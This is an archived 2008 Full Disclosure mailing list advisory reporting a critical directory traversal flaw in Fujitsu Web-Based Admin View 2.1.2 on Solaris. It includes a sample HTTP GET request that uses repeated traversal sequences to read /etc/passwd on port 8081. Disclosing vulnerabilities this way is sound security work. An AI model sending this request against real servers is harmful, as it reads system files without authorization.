Full Disclosure mailing list archives
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
From: "Deniz Cevik" <Deniz.Cevik () intellect com tr>
Date: Thu, 21 Aug 2008 16:34:00 +0300
Fujitsu Web-Based Admin View Directory Traversal Vulnerability Version: 2.1.2 on Solaris, Other versions may vulnerable Vulnerability: Directory Traversal Risk: Critical Description: Due to insufficient control of user inputs, Fujitsu Web-based admin view reveals content of files residing in folders other than webroot. This will allow an attacker to view arbitrary local files within the context of the web server. Sample Request: GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0 Host: target:8081 Deniz CEVIK www.intellectpro.com.tr
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fujitsu Web-Based Admin View Directory Traversal Vulnerability Deniz Cevik (Aug 21)